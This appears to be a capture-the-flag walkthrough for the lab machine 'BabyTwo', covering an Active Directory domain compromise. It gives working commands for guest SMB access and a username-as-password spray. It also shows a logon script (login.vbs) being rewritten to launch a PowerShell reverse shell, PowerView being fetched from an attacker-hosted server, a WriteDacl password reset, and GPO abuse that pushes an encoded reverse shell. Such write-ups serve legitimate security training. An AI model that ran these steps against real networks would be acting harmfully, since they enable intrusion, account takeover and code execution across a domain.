BabyTwo

OVERVIEW

So we have given IP address of the machine so Let’s head to Nmap to scan this IP

As you can see we came to found the open ports and machine host name and its DC name So add both of them into /etc/hosts

So As we don’t have user password lets just try using guest login as guest as username and empty password

nxc smb #MACHINE_IP -u guest -p ''

Here we go guest is allowed to access SMB server so Now let’s use smbmap to access the shares:

smbmap -H 10.129.179.22 -u guest -p ''

And we can see there is a share named as homes which guest user have READ,WRITE access

So Let’s access the share using smbclient

smbclient -U 'guest%' '//baby2.vl/homes'

We successfully got the access to the share and in that we can see there is a list of users so we can just save the users into a file

Now Since we have users but don’t have their password so there is a slight chance that some of the users are using their name as both USERNAME and PASSWORD
So let’s check it by spraying their username and password with the name of the users we got using netexec

nxc smb 10.129.179.22 -u users.txt -p users.txt --no-bruteforce --continue-on-success

Got two users who has set their username as their password so Now Let’s Access the shares using any of the user using smbmap again

we got READ and WRITE access on docs and apps shares

So let’s check it out:

When I checked It is empty so let’s check SYSVOL share too

I saw login.vbs file so let’s see what it consist of

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    

    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next

    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If

    objNetwork.MapNetworkDrive driveLetter & ":", sharePath

    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If

    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

This script is a logon script for users and it maps network shares. This means that it will be executed every time a user logs in. Since we have write access to this two share, we can embed a malicious reverse shell inside this file so that when a user logs in, it will be executed and give us a shell

USER FLAG / LOCAL SHELL

So first let’s head to revshells.com and go to PowerShell base64 payloads

NOTE: Keep In Mind To Change LOCAL MACHINE IP and Port

Now edit the login.vbs file in your local machine and put below commands in it :

Set oShell = CreateObject("WScript.Shell")
oShell.run "your-powershell-payload"

now go to the SMB shell and remove the file then again put it from the same directory where you had saved login.vbs

del login.vbs
put login.vbs

Open a netcat shell on the port on your local Machine and you will get a shell

So we are logged in with amelia.griffiths id

Now Go To C:\ and get User Flag

PRIVILEGE ESCALATION / ROOT FLAG

Now Remember we have Carle.Moore Id and Password So we can run bloodhound with it

bloodhound-python -u Carl.Moore -p Carl.Moore -d baby2.vl -ns 10.129.179.22 -c ALL --zip

Now Let’s Analyze it in bloodhound So open neo4j and run bloodhound

As you can see we own Amelia Griffiths user so shortest path from owned principal is above and we can notice that it is a member of LEGACY@BABY2.VL so we can see it has a WriteDacl to the user GPOADM@BABY2.VL then after owning that user we can do generic all for privilege escalation.

WRITEDACL

Now to do this attack you must have PowerView.ps1 module so first git clone or download it from https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon to your local machine.

Now start a local python server in that directory where you had downloaded the PowerView.ps1 module

python3 -m http.server 8000

and in PS C:\Temp> download this module from the local machine to the shell

Invoke-WebRequest -Uri 'http://LOCAL-SERVER-IP:8000/PowerView.ps1' -OutFile 'C:\Temp\PowerView.ps1'
. C:\Temp\PowerView.ps1

Now after running PowerView.ps1 module do this to change GPOADMIN Account password

add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

set-domainuserpassword gpoadm -accountpassword $cred

Here We go our WriteDacl Attack was successful

GENERIC ALL

Now Let’s Get the root shell using Generic All Method which in case is ACL over the Group Policy Objects

For this we will use pyGPOAbuse tool

In Your Local Machine terminal use this below command and the PowerShell rev shell is same as before (don’t include PowerShell -e )

BE SURE TO PUT DIFFERENT PORT FROM BEFORE TO AVOID GETTING SAME LOCAL SHELL AGAIN

python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' -command "powershell -exec bypass -enc base64-rev-powershell"  -dc-ip ATTACK-MACHINE-IP -gpo-id "YOUR-GPO-ID"

You will get you GPO ID from your bloodhound in Node properties section